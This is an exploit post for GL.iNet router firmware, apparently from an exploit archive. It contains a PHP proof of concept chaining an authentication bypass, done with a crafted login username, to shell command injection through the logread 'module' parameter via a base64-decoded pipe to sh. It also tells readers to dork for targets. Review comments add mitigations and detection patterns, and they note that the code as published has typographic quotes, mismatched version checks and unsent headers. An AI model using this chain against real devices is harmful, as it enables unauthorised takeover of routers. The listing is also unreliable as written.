GL.iNet 4.4.3 Code Injection

=============================================================================================================================================
| # Title : GL.iNet network 4.4.3 Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |
| # Vendor : https://www.gl-inet.com/ |
=============================================================================================================================================

PoC:

[+] Dorking in Google or another search engine.

[+] Uses cURL to send the remote command.

[+] Line 158: set your target.

[+] Save the code as poc.php.

[+] Usage: cmd => c:\www\test\php poc.php

[+] Payload:

<?php

/**
 * Proof-of-concept client for the GL.iNet /rpc JSON-RPC endpoint.
 *
 * Two issues are exercised in sequence: a crafted username accepted by the
 * `login` method (auth_bypass) and an unvalidated `module` parameter of
 * `logread.get_system_log` that reaches a shell (execute_command).
 *
 * NOTE(review): the code is reproduced as published; the quote characters
 * (‘ ’ “ ”) are typographic and are not valid PHP string delimiters, so this
 * listing does not run as-is.
 */
class GlinetExploit
{
// Base URL of the device, e.g. https://host (no trailing slash expected,
// since every request appends a path that starts with '/').
private $targetUri;
// Session id returned by a successful login; null until auth_bypass() succeeds.
private $sid;
// Fingerprint filled in by check_vuln_version(): model, firmware, arch.
private $glinet;

/**
 * @param string $targetUri base URL of the device (scheme + host, no path)
 */
public function __construct($targetUri)
{
$this->targetUri = $targetUri;
$this->glinet = [
‘model’ => null,
‘firmware’ => null,
‘arch’ => null
];
}

/**
 * Send one HTTP request to $targetUri . $uri and decode the JSON reply.
 *
 * @param string      $method  HTTP verb passed as CURLOPT_CUSTOMREQUEST
 * @param string      $uri     path appended to the base URL
 * @param string|null $data    raw POST body; when truthy it is sent as JSON
 * @param array       $headers extra header lines (see note below)
 * @return array|null decoded JSON body, or null when curl returned nothing
 *                    (curl_exec returns false on transport failure)
 */
private function send_request($method, $uri, $data = null, $headers = [])
{
$ch = curl_init();

// Only URL, return-transfer and verb are configured; no timeout is set and
// the TLS verification options are left at curl's defaults.
$options = [
CURLOPT_URL => $this->targetUri . $uri,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CUSTOMREQUEST => $method
];

// Truthiness check: an empty-string or '0' body is treated as "no body".
if ($data) {
$options[CURLOPT_POSTFIELDS] = $data;
$headers[] = ‘Content-Type: application/json’;
}

// NOTE: $headers is assembled but CURLOPT_HTTPHEADER is never set, so
// nothing in $headers (including the Admin-Token passed by
// execute_command) is actually attached to the request as written.
curl_setopt_array($ch, $options);
$response = curl_exec($ch);
curl_close($ch);

// Decode failures are not distinguished: invalid JSON yields null as well.
return $response ? json_decode($response, true) : null;
}

/**
 * Fingerprint the device via the unauthenticated `ui.check_initialized`
 * call and decide whether it is in the affected model/firmware set.
 *
 * Side effect: fills $this->glinet['model'], ['firmware'] and, for a
 * matched model, ['arch'].
 *
 * @return bool true only for an exact firmware match on a listed model
 */
public function check_vuln_version()
{
// First params element is an empty session id: this call needs no auth.
$postData = json_encode([
‘jsonrpc’ => ‘2.0’,
‘id’ => rand(1000, 9999),
‘method’ => ‘call’,
‘params’ => [”, ‘ui’, ‘check_initialized’, []]]);

$res = $this->send_request(‘POST’, ‘/rpc’, $postData);
if ($res && isset($res[‘result’])) {
$this->glinet[‘model’] = $res[‘result’][‘model’];
$this->glinet[‘firmware’] = $res[‘result’][‘firmware_version’];
}

// Check for vulnerable models and firmware
// A null model (request failed) matches no case and falls through to false.
// NOTE(review): the page title names 4.4.3, but these checks only accept
// 4.3.6 / 4.3.7 exactly (version_compare with '=='); other builds report
// "Not Vulnerable" regardless of their actual state — confirm against the
// vendor advisory before relying on this as a scanner.
switch ($this->glinet[‘model’]) {
case ‘sft1200’:
$this->glinet[‘arch’] = ‘mipsle’;
return version_compare($this->glinet[‘firmware’], ‘4.3.6’, ‘==’);
case ‘ar750’:
case ‘ar750s’:
$this->glinet[‘arch’] = ‘mipsbe’;
return version_compare($this->glinet[‘firmware’], ‘4.3.7’, ‘==’);
// Add more cases as per your requirement
}

return false;
}

/**
 * Obtain a session id without the real root password.
 *
 * Flow: `challenge` for user root -> nonce; then `login` with a crafted
 * username and md5("user:pw:nonce"). The username is not a plain account
 * name: it embeds a SQL-style `union select` fragment plus regex-like
 * bracket/`[^:]+` pieces, which only works if the server treats the
 * username as a pattern or query rather than an exact identifier.
 *
 * Mitigation: look the account up by exact, length-limited identifier.
 * Detection: `login` RPC requests whose username contains SQL keywords,
 * `[`/`]`/`^` metacharacters, or is far longer than any configured user.
 *
 * @return string|null session id on success, null otherwise
 */
public function auth_bypass()
{
// Reuse an existing session if one was already obtained.
if (!empty($this->sid)) {
return $this->sid;
}

$postData = json_encode([
‘jsonrpc’ => ‘2.0’,
‘id’ => rand(1000, 9999),
‘method’ => ‘challenge’,
‘params’ => [‘username’ => ‘root’]]);

$res = $this->send_request(‘POST’, ‘/rpc’, $postData);

if ($res && isset($res[‘result’][‘nonce’])) {
$nonce = $res[‘result’][‘nonce’];

$username = “roo[^’union selecT char(114,111,111,116)–]:[^:]+:[^:]+”;
$pw = ‘0’;
// Hash format mirrors the device's challenge/response scheme; a dummy
// password ('0') is used because the crafted username is what matters.
$hash = md5(“$username:$pw:$nonce”);

$postData = json_encode([
‘jsonrpc’ => ‘2.0’,
‘id’ => rand(1000, 9999),
‘method’ => ‘login’,
‘params’ => [
‘username’ => $username,
‘hash’ => $hash
]]);

$res = $this->send_request(‘POST’, ‘/rpc’, $postData);

if ($res && isset($res[‘result’][‘sid’])) {
$this->sid = $res[‘result’][‘sid’];
return $this->sid;
}
}

return null;
}

/**
 * Run a shell command on the device through `logread.get_system_log`.
 *
 * The command is base64-wrapped and injected into the `module` argument
 * with a leading pipe; the server-side handler evidently interpolates
 * `module` into a shell pipeline without validation.
 *
 * Mitigation: validate `module` against an allow-list of known log
 * facilities and pass it as an argument, never through a shell.
 * Detection: `get_system_log` calls whose `module` contains `|`, `sh`,
 * or `openssl enc -base64 -d`, and logread children spawning a shell.
 *
 * Precondition: $this->sid must already be set (no check is made here).
 *
 * @param string $cmd shell command to run on the device
 * @return array|null decoded RPC reply, or null on transport failure
 */
public function execute_command($cmd)
{
$payload = base64_encode($cmd);
$cmd = “echo {$payload}|openssl enc -base64 -d -A|sh”;

$postData = json_encode([
‘jsonrpc’ => ‘2.0’,
‘id’ => rand(1000, 9999),
‘method’ => ‘call’,
‘params’ => [
$this->sid,
‘logread’,
‘get_system_log’,
[‘lines’ => ”, ‘module’ => “|{$cmd}”]]]);

// The Admin-Token header is passed here but send_request() never applies
// its $headers to curl, so only the sid inside the JSON body is sent.
return $this->send_request(‘POST’, ‘/rpc’, $postData, [‘Admin-Token: ‘ . $this->sid]);
}

/**
 * Human-readable result of check_vuln_version().
 *
 * @return string "Vulnerable: model | firmware | arch" or 'Not Vulnerable'
 */
public function check()
{
if ($this->check_vuln_version()) {
return “Vulnerable: {$this->glinet[‘model’]} | {$this->glinet[‘firmware’]} | {$this->glinet[‘arch’]}”;
}

return ‘Not Vulnerable’;
}

/**
 * Full chain: auth_bypass() then execute_command(). Does not call check()
 * first, and the RPC reply of execute_command() is discarded, so no
 * command output is shown.
 *
 * @param string $command shell command to run on the device
 * @return void
 */
public function exploit($command)
{
$this->sid = $this->auth_bypass();

if ($this->sid) {
echo “SID: {$this->sid}\n”;
echo “Executing: {$command}\n”;
$this->execute_command($command);
} else {
echo “Authentication bypass failed.\n”;
}
}
}

// Usage
// ‘https://target-url’ is a placeholder; the chain runs without calling
// check() first, so a non-matching device only prints the bypass failure.
$exploit = new GlinetExploit(‘https://target-url’);
$exploit->exploit(‘ls’);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
